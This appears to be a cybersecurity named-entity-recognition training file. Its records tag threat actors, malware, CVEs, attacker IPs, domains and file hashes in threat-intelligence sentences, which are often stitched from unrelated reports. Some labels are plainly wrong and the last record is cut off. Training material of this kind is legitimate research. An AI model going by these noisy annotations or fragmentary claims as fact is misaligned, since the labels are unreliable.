ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine .", "spans": {"MALWARE: ISMDoor": [[287, 294]]}, "info": {"id": "cyberner_stix_train_001480", "source": "cyberner_stix_train"}} {"text": "It also shows a current malware log . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories . APT33 : 162.250.145.234 mynetwork.ddns.net . Money as a motivation may be the most frequent but also easiest to deal with of the four .", "spans": {"TOOL: backdoor Trojan": [[43, 58]], "TOOL: Volgmer": [[61, 68]], "THREAT_ACTOR: APT33": [[275, 280]], "IP_ADDRESS: 162.250.145.234": [[283, 298]], "DOMAIN: mynetwork.ddns.net": [[299, 317]]}, "info": {"id": "cyberner_stix_train_001481", "source": "cyberner_stix_train"}} {"text": "] 87:28844 61 [ . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . It should be noted that because the requested resource is being stored as a string and executed , this all occurs in memory . Check that there is more than 5 GB of disk space on the NetScaler device available ( instructions from vendor ) .", "spans": {"THREAT_ACTOR: Dukes": [[22, 27]], "THREAT_ACTOR: cyberespionage group": [[82, 102]]}, "info": {"id": "cyberner_stix_train_001482", "source": "cyberner_stix_train"}} {"text": "Figure 28 : Jaguar Kill Switch infected GP apps Peek Into the Actor Based on all of the above , we connected “ Agent Smith ” campaign to a Chinese internet company located in Guangzhou whose front end legitimate business is to help Chinese Android developers publish and promote their apps on overseas platforms . 
One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 . Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": {"MALWARE: Agent Smith": [[111, 122]], "SYSTEM: Android": [[240, 247]], "TOOL: Quik": [[393, 397]], "TOOL: Ranbyus": [[404, 411]]}, "info": {"id": "cyberner_stix_train_001483", "source": "cyberner_stix_train"}} {"text": "As our researchers discovered , it also lays its hands on the outgoing SMS and filters the incoming ones . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload .", "spans": {"VULNERABILITY: zero-day vulnerability": [[135, 157]], "THREAT_ACTOR: actors": [[455, 461]]}, "info": {"id": "cyberner_stix_train_001484", "source": "cyberner_stix_train"}} {"text": "On September 10 , 2019 , we observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization .", "spans": {"THREAT_ACTOR: unknown": [[37, 44]], "TOOL: SharePoint": [[89, 99]], "VULNERABILITY: CVE-2019-0604": [[113, 126]]}, "info": {"id": "cyberner_stix_train_001485", "source": "cyberner_stix_train"}} {"text": "But all in all Triada is yet another example of a really bad trend : malware developers are taking Android seriously , and the latest samples are almost as complex and hard to withstand , as their Windows-based kin . 
After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region .", "spans": {"MALWARE: Triada": [[15, 21]], "SYSTEM: Android": [[99, 106]], "SYSTEM: Windows-based": [[197, 210]], "MALWARE: RTF files": [[269, 278]], "VULNERABILITY: CVE-2018-0798": [[299, 312]], "THREAT_ACTOR: APT34": [[381, 386]]}, "info": {"id": "cyberner_stix_train_001486", "source": "cyberner_stix_train"}} {"text": "Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis group": [[20, 36]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[54, 95]], "VULNERABILITY: CVE-2016-4117": [[98, 111]], "TOOL: FinSpy": [[158, 164]], "MALWARE: Epic Turla": [[246, 256]], "ORGANIZATION: embassies": [[335, 344]]}, "info": {"id": "cyberner_stix_train_001487", "source": "cyberner_stix_train"}} {"text": "From the attacks observed by Volexity , what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks . These versions of KeyBoy differed from the one first described by Rapid7 in several ACTs , many of which will be described in the sections to follow .", "spans": {"ORGANIZATION: Volexity": [[29, 37]], "THREAT_ACTOR: Patchwork": [[69, 78]], "MALWARE: KeyBoy": [[188, 194]], "ORGANIZATION: Rapid7": [[236, 242]]}, "info": {"id": "cyberner_stix_train_001488", "source": "cyberner_stix_train"}} {"text": "Malware code showing onCreate method Figure 9. 
onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string “ CuffGmrQRT ” as the first argument , which is the name of the encrypted file stored in the Assets folder . backdoors that now appear to be part of APT15 's toolset . It turns out that the first ZIP structure is for the image file order.jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf.exe . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"THREAT_ACTOR: APT15": [[377, 382]], "FILEPATH: order.jpg": [[460, 469]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.exe": [[517, 551]], "ORGANIZATION: Astamirov": [[554, 563]]}, "info": {"id": "cyberner_stix_train_001489", "source": "cyberner_stix_train"}} {"text": "It ’ s a messaging object that can be used to request an action from another app component . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor . That usually means that the name of the file inside the archive ends with 2 known file extensions “pdf.” (archiving tools usually defaults the to the archive’s format e.g. ) . 
The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": {"THREAT_ACTOR: Ke3chang": [[142, 150]], "THREAT_ACTOR: APT group": [[151, 160]], "ORGANIZATION: ESET": [[163, 167]], "THREAT_ACTOR: group": [[243, 248]], "SYSTEM: IEC 60870 - 5 - 104 ( IEC-104 ) devices": [[568, 607]], "SYSTEM: remote terminal units ( RTUs )": [[618, 648]]}, "info": {"id": "cyberner_stix_train_001490", "source": "cyberner_stix_train"}} {"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day vulnerability": [[65, 87]], "ORGANIZATION: Arbor Networks": [[260, 274]], "MALWARE: Trojan": [[341, 347]], "MALWARE: RAT": [[350, 353]], "MALWARE: Ismdoor": [[363, 370]]}, "info": {"id": "cyberner_stix_train_001491", "source": "cyberner_stix_train"}} {"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . 
ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": {"TOOL: Dridex": [[19, 25]], "ORGANIZATION: banking": [[62, 69]], "THREAT_ACTOR: INDRIK SPIDER": [[152, 165]], "THREAT_ACTOR: ScarCruft": [[208, 217]]}, "info": {"id": "cyberner_stix_train_001492", "source": "cyberner_stix_train"}} {"text": "According to its profile at Google Play ( see Figure 2 ) the app reached a mere 10+ downloads . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server .", "spans": {"SYSTEM: Google Play": [[28, 39]], "THREAT_ACTOR: SWEED": [[96, 101]], "MALWARE: DDoS": [[219, 223]], "MALWARE: malware": [[224, 231]]}, "info": {"id": "cyberner_stix_train_001493", "source": "cyberner_stix_train"}} {"text": "Figure 16 : integrating an in-house ad SDK Figure 17 : replacing original app activities with the malicious ad SDK activity Figure 18 : the malware showing ads on any activity being loaded Connecting the Dots As our malware sample analysis took the team closer to reveal the “ Agent Smith ” campaign in its entirety and it is here that the C & C server investigation enters the center stage . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance . Having dual monitoring services provides redundancy in case one of the monitoring processes is halted . 
Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server ’s Unified Messaging Service .", "spans": {"THREAT_ACTOR: Clever Kitten": [[395, 408]], "TOOL: web vulnerability scanner": [[441, 466]], "SYSTEM: Exchange Server ’s Unified Messaging Service": [[706, 750]]}, "info": {"id": "cyberner_stix_train_001494", "source": "cyberner_stix_train"}} {"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents .", "spans": {"MALWARE: JavaScript": [[4, 14]], "FILEPATH: backdoor": [[270, 278]], "TOOL: emails": [[297, 303]]}, "info": {"id": "cyberner_stix_train_001495", "source": "cyberner_stix_train"}} {"text": "Clicking the SMS link brings the user to a fake website that prompts them to download and install the FakeSpy APK , which is masquerading as a local postal service app . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks .", "spans": {"MALWARE: FakeSpy": [[102, 109]], "THREAT_ACTOR: APT33": [[170, 175]], "THREAT_ACTOR: attackers": [[324, 333]], "ORGANIZATION: banks": [[422, 427]]}, "info": {"id": "cyberner_stix_train_001496", "source": "cyberner_stix_train"}} {"text": "JNI Bread has also tested our ability to analyze native code . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware . LoadDll Load a DLL into the specified process . 
This campaign also strays from Infys usual target group of Iranian individuals and entities , with victims of Foudre located in Sweden , the Netherlands , the U.S. , along with others across Europe , Iraq , and India .", "spans": {"MALWARE: Bread": [[4, 9]], "TOOL: Poison Ivy malware": [[221, 239]], "TOOL: LoadDll": [[242, 249]], "TOOL: DLL": [[257, 260]], "THREAT_ACTOR: Infys": [[321, 326]], "ORGANIZATION: Iranian individuals and entities": [[349, 381]], "THREAT_ACTOR: Foudre": [[400, 406]]}, "info": {"id": "cyberner_stix_train_001497", "source": "cyberner_stix_train"}} {"text": "] com glancelove [ . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"THREAT_ACTOR: APT33": [[21, 26]], "ORGANIZATION: aviation": [[39, 47], [161, 169]], "ORGANIZATION: military": [[205, 213]]}, "info": {"id": "cyberner_stix_train_001498", "source": "cyberner_stix_train"}} {"text": "The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros .", "spans": {"TOOL: macro": [[43, 48]], "TOOL: macros": [[114, 120]]}, "info": {"id": "cyberner_stix_train_001499", "source": "cyberner_stix_train"}} {"text": "In 2016 , these services protected over 1.4 billion devices , making Google one of the largest providers of on-device security services in the world : Identify PHAs using people , systems in the cloud , and data sent to us from devices Warn users about or blocking users from installing PHAs Continually scan 
devices for PHAs and other harmful threats Additionally , we are providing detailed technical information to help the security industry in our collective work against PHAs . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors . While two of the compromised products no longer include the backdoor , one of the affected developers is still distributing the trojanized version : ironically , the game is named Infestation , and is produced by Thai developer Electronics Extreme . One of the most common ways that cybercriminals earn money is by selling data on the black market .", "spans": {"ORGANIZATION: Google": [[69, 75]], "THREAT_ACTOR: Leafminer": [[483, 492]], "THREAT_ACTOR: threat actors": [[618, 631]], "ORGANIZATION: Electronics Extreme": [[862, 881]], "THREAT_ACTOR: cybercriminals": [[917, 931]]}, "info": {"id": "cyberner_stix_train_001500", "source": "cyberner_stix_train"}} {"text": "We believe that during the first half of 2010 , the Dukes slowly migrated from PinchDuke and started using a new infostealer malware toolset that we call CosmicDuke .", "spans": {"THREAT_ACTOR: Dukes": [[52, 57]], "MALWARE: PinchDuke": [[79, 88]], "MALWARE: CosmicDuke": [[154, 164]]}, "info": {"id": "cyberner_stix_train_001501", "source": "cyberner_stix_train"}} {"text": "From the previous samples , we performed a passive DNS lookup on the IPs .", "spans": {"TOOL: IPs": [[69, 72]]}, "info": {"id": "cyberner_stix_train_001502", "source": "cyberner_stix_train"}} {"text": "The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . 
Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand .", "spans": {"TOOL: WannaCry malware": [[4, 20]], "TOOL: SMB": [[180, 183]], "MALWARE: Bookworm C2 servers": [[268, 287]]}, "info": {"id": "cyberner_stix_train_001503", "source": "cyberner_stix_train"}} {"text": "We believe this cluster of campaigns had a joint goal of gathering intelligence on the sentiments of the targeted 5 countries with respect to the plans being discussed at the time for the US to locate their “ European Interceptor Site ” missile defense base in Poland , with a related radar station that was intended to be located in the Czech Republic .", "spans": {}, "info": {"id": "cyberner_stix_train_001504", "source": "cyberner_stix_train"}} {"text": "However , there are still two issues here : The numbers to contact for cancelling the subscription are not real The billing process commences even if you don ’ t hit the “ Confirm ” button Even if the disclosure here displayed accurate information , the user would often find that the advertised functionality of the app did not match the actual content . The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques . It connects to the first remote C&C that tries to contact it and succeeds in the handshake . When combined with the data from your vulnerability scanners , it delivers a full picture of the exposures in your environment .", "spans": {"TOOL: Barlaiy": [[422, 429]], "TOOL: PlugXL": [[438, 444]], "TOOL: C&C": [[555, 558]]}, "info": {"id": "cyberner_stix_train_001505", "source": "cyberner_stix_train"}} {"text": "The attack campaign , named Gooligan , breached the security of over one million Google accounts . 
APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . HexRaysDeob installs two callbacks when loading : It trick users into connecting their wallet with the goal of initiating transactions to drain their account .", "spans": {"MALWARE: Gooligan": [[28, 36]], "ORGANIZATION: Google": [[81, 87]], "THREAT_ACTOR: APT37": [[99, 104]], "THREAT_ACTOR: Reaper": [[107, 113]], "THREAT_ACTOR: state-sponsored group": [[139, 160]], "ORGANIZATION: financial company": [[189, 206]], "TOOL: HexRaysDeob": [[256, 267]]}, "info": {"id": "cyberner_stix_train_001506", "source": "cyberner_stix_train"}} {"text": "Finally the payload is executed by rundll32.exe ( and the ordinal #1 in argument ) or by explorer.exe if the COM Object hijack is performed .", "spans": {"FILEPATH: rundll32.exe": [[35, 47]], "FILEPATH: explorer.exe": [[89, 101]]}, "info": {"id": "cyberner_stix_train_001507", "source": "cyberner_stix_train"}} {"text": "Figure 3: BACKSWING Version 2Version 1:FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": {"ORGANIZATION: 1:FireEye": [[37, 46]], "MALWARE: BACKSWING": [[77, 86]], "ORGANIZATION: hospitality organization": [[142, 166]], "ORGANIZATION: government": [[184, 194]], "ORGANIZATION: Kaspersky": [[236, 245]], "VULNERABILITY: zero-day": [[271, 279]], "VULNERABILITY: exploit": [[280, 287]], "THREAT_ACTOR: BlackOasis": [[296, 306]]}, "info": {"id": "cyberner_stix_train_001508", "source": "cyberner_stix_train"}} {"text": "This gives users a chance to see details and better understand any changes made . 
While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 . The controller provided the malware with base64-encoded data to be . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": {"THREAT_ACTOR: APT group": [[231, 240]], "THREAT_ACTOR: APT16": [[261, 266]], "ORGANIZATION: The Chaos Creator": [[345, 362]], "ORGANIZATION: Harrison": [[398, 406]], "ORGANIZATION: Ashley Madison": [[411, 425]]}, "info": {"id": "cyberner_stix_train_001509", "source": "cyberner_stix_train"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "MALWARE: HyperBro": [[252, 260]], "MALWARE: Remote Access Trojan": [[265, 285]], "MALWARE: RAT": [[288, 291]]}, "info": {"id": "cyberner_stix_train_001510", "source": "cyberner_stix_train"}} {"text": "Whether or not rooting succeeds , HummingBad downloads a large number of apps . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . APT33 : 64.251.19.217 [REDACTED].myftp.org . 
Here are some reasons why : • No WebSocket being used To complicate things , we observed some stores that had both skimmers at the same time , which is another reason why we believe they are not related : We started calling this new skimmer ' Kritec ' after one of its domain names .", "spans": {"MALWARE: HummingBad": [[34, 44]], "TOOL: WannaCry malware": [[84, 100]], "TOOL: SMB": [[260, 263]], "THREAT_ACTOR: APT33": [[292, 297]], "IP_ADDRESS: 64.251.19.217": [[300, 313]], "DOMAIN: [REDACTED].myftp.org": [[314, 334]], "TOOL: WebSocket": [[370, 379]], "MALWARE: skimmers": [[452, 460]], "MALWARE: skimmer": [[570, 577]], "MALWARE: Kritec": [[580, 586]]}, "info": {"id": "cyberner_stix_train_001511", "source": "cyberner_stix_train"}} {"text": "Pharmaceutical companies .", "spans": {"ORGANIZATION: Pharmaceutical companies": [[0, 24]]}, "info": {"id": "cyberner_stix_train_001512", "source": "cyberner_stix_train"}} {"text": "Sofacy Group’s Parallel Attacks .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_001513", "source": "cyberner_stix_train"}} {"text": "FBI has high confidence that HIDDEN COBRA actors are using the IP S-PROT addresses for further network exploitation .", "spans": {"ORGANIZATION: FBI": [[0, 3]], "THREAT_ACTOR: HIDDEN COBRA": [[29, 41]], "TOOL: IP S-PROT addresses": [[63, 82]]}, "info": {"id": "cyberner_stix_train_001515", "source": "cyberner_stix_train"}} {"text": "like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump While it lacks more advanced functionality like screen capturing , it is still able 
to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access . We do not know the motives of the attackers at this point . 3AM is written in Rust and appears to be a completely new malware family .", "spans": {"MALWARE: FinFisher": [[145, 154]], "THREAT_ACTOR: threat actors": [[599, 612]], "MALWARE: 3AM": [[784, 787]], "TOOL: Rust": [[802, 806]]}, "info": {"id": "cyberner_stix_train_001516", "source": "cyberner_stix_train"}} {"text": "The new malware appears to be linked to the infamous Wolf Research organization and targets Android devices located in Thailand . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Most of the IP addresses of IXESHE ’s victims are linked to DSL networks , which made it difficult to determine their identities . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"ORGANIZATION: Wolf Research": [[53, 66]], "SYSTEM: Android": [[92, 99]], "TOOL: Winnti installer": [[172, 188]], "THREAT_ACTOR: IXESHE": [[337, 343]], "TOOL: DSL": [[369, 372]], "MALWARE: SocGholish": [[518, 528]]}, "info": {"id": "cyberner_stix_train_001517", "source": "cyberner_stix_train"}} {"text": "While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks , we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets . 
Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image .", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[74, 85]], "THREAT_ACTOR: TEMP.Reaper": [[161, 172]], "THREAT_ACTOR: Whitefly": [[228, 236]], "MALWARE: dropper": [[271, 278]], "FILEPATH: malicious.exe": [[296, 309]], "FILEPATH: .dll file": [[313, 322]]}, "info": {"id": "cyberner_stix_train_001518", "source": "cyberner_stix_train"}} {"text": "During incidents that involved BitPaymer , Dridex was installed on the victim network prior to the deployment of the BitPaymer malware . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload .", "spans": {"TOOL: BitPaymer": [[31, 40]], "TOOL: Dridex": [[43, 49]], "TOOL: BitPaymer malware": [[117, 134]], "MALWARE: downloader": [[141, 151]], "MALWARE: malware": [[152, 159]], "TOOL: C2": [[208, 210]]}, "info": {"id": "cyberner_stix_train_001519", "source": "cyberner_stix_train"}} {"text": "In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": {"THREAT_ACTOR: APT41": [[21, 26], [146, 151]], "TOOL: TeamViewer": [[37, 47]], "THREAT_ACTOR: Patchwork": [[187, 196]], "FILEPATH: RTF files": [[223, 232]], "VULNERABILITY: CVE-2017-8570": [[244, 257]]}, "info": {"id": "cyberner_stix_train_001520", "source": "cyberner_stix_train"}} {"text": "] com/ hxxp : //www [ . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab variant . 
The URLs provided access to the C2s , along with commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": {"THREAT_ACTOR: Sofacy group": [[28, 40]], "VULNERABILITY: Flash exploits": [[84, 98]], "TOOL: Carberp": [[116, 123]], "TOOL: JHUHUGIT downloaders": [[130, 150]], "TOOL: PowerShell": [[215, 225]], "MALWARE: Ursnif": [[300, 306]], "MALWARE: GandCrab": [[311, 319]]}, "info": {"id": "cyberner_stix_train_001521", "source": "cyberner_stix_train"}} {"text": "] cc/TiktokPro . Gamaredon Group's implants are characterized by the employment of information stealing tools — among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Ids.me .", "spans": {"THREAT_ACTOR: Gamaredon Group's": [[17, 34]], "TOOL: information stealing tools": [[83, 109]], "DOMAIN: Ids.me": [[243, 249]]}, "info": {"id": "cyberner_stix_train_001522", "source": "cyberner_stix_train"}} {"text": "In addition , its original target list is extremely narrow and seems to be focused on Spanish banks . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . Dragonfly 2.0 is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016 .", "spans": {"MALWARE: Margarita": [[135, 144]], "THREAT_ACTOR: Dragonfly 2.0": [[264, 277]], "ORGANIZATION: government entities": [[325, 344]], "ORGANIZATION: critical infrastructure sectors": [[363, 394]]}, "info": {"id": "cyberner_stix_train_001523", "source": "cyberner_stix_train"}} {"text": "An HTTP protocol with encrypted payload is used for the Command & Control communication .", "spans": {"TOOL: Command & Control": [[56, 73]]}, "info": {"id": "cyberner_stix_train_001524", "source": "cyberner_stix_train"}} {"text": "] comfeteh-asefa [ . 
On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . These themes cause APT1 command and control addresses to appear benign at first glance . These restrictions are specified by a list of allowed URIs .", "spans": {"ORGANIZATION: Palo Alto Networks": [[39, 57]], "THREAT_ACTOR: Infy": [[168, 172]], "THREAT_ACTOR: APT1": [[317, 321]], "SYSTEM: a list of allowed URIs": [[423, 445]]}, "info": {"id": "cyberner_stix_train_001525", "source": "cyberner_stix_train"}} {"text": "For testing purposes we inserted a fake contacts list to our Android Emulator and observed resultant behavior . However , using NCC Group’s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . 
As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"SYSTEM: Android": [[61, 68]], "ORGANIZATION: NCC": [[128, 131], [289, 292]], "THREAT_ACTOR: Emissary Panda": [[322, 336]], "ORGANIZATION: FireEye": [[383, 390]], "THREAT_ACTOR: Ke3chang": [[464, 472]]}, "info": {"id": "cyberner_stix_train_001527", "source": "cyberner_stix_train"}} {"text": "Two samples specifically , 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 and 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 provided additional artifacts we were able to pivot from to discover weaponized documents to deliver Zebrocy as well as a Koadic .", "spans": {"FILEPATH: 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8": [[27, 91]], "FILEPATH: 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03": [[96, 160]], "MALWARE: Zebrocy": [[262, 269]], "TOOL: Koadic": [[283, 289]]}, "info": {"id": "cyberner_stix_train_001528", "source": "cyberner_stix_train"}} {"text": "Although Shamoon was previously documented in research blogs , the specific network compromise methods leading to the attacks have remained unclear in the reported cases .", "spans": {"MALWARE: Shamoon": [[9, 16]]}, "info": {"id": "cyberner_stix_train_001529", "source": "cyberner_stix_train"}} {"text": "When the malware communicates with the C2 server , it uses a POST request with several predefined headers .", "spans": {"TOOL: C2": [[39, 41]]}, "info": {"id": "cyberner_stix_train_001530", "source": "cyberner_stix_train"}} {"text": "To carry out this functionality , after writing the", "spans": {}, "info": {"id": "cyberner_stix_train_001531", "source": "cyberner_stix_train"}} {"text": "Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with 
connections to foreign investors . On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "ORGANIZATION: network security": [[47, 63]], "ORGANIZATION: technology infrastructure corporations": [[68, 106]], "ORGANIZATION: Palo Alto": [[165, 174]]}, "info": {"id": "cyberner_stix_train_001532", "source": "cyberner_stix_train"}} {"text": "Once inside the network , Artifact #1 can be enough for the attacker to download or create additional scripts , execute commands and exfiltrate data ( for example , simply through ftp ) .", "spans": {}, "info": {"id": "cyberner_stix_train_001533", "source": "cyberner_stix_train"}} {"text": "Collapsing the collection back down , note the two domains “ brontorittoozzo.com ” and “ randomessstioprottoy.net ” that fall outside of the collection due to more infrastructure connections .", "spans": {"DOMAIN: brontorittoozzo.com": [[61, 80]], "DOMAIN: randomessstioprottoy.net": [[89, 113]]}, "info": {"id": "cyberner_stix_train_001534", "source": "cyberner_stix_train"}} {"text": "] nampriknum [ . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . We observed an example of this phenomenon around May . 
While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": {"TOOL: KeyBoy samples": [[55, 69]]}, "info": {"id": "cyberner_stix_train_001535", "source": "cyberner_stix_train"}} {"text": "After downloading , it will be loaded by the main module via DexClassLoader api : As mentioned , we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . The group appears to have targeted academic institutions , but its motives remain unclear .", "spans": {"SYSTEM: WhatsApp messenger": [[148, 166]]}, "info": {"id": "cyberner_stix_train_001536", "source": "cyberner_stix_train"}} {"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . 
The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant .", "spans": {"ORGANIZATION: aerospace": [[166, 175]], "ORGANIZATION: communication industries": [[180, 204]], "ORGANIZATION: diplomats": [[224, 233]], "ORGANIZATION: military attachés": [[236, 253]], "ORGANIZATION: private assistants": [[256, 274]], "ORGANIZATION: secretaries": [[277, 288]], "ORGANIZATION: Prime Ministers": [[292, 307]], "ORGANIZATION: journalists": [[310, 321]]}, "info": {"id": "cyberner_stix_train_001537", "source": "cyberner_stix_train"}} {"text": "Within each variant , the malicious code present in each sample may look nearly identical with only one evasion technique changed . In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor . In versions 3.22 and 3.39 the routine changes . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": 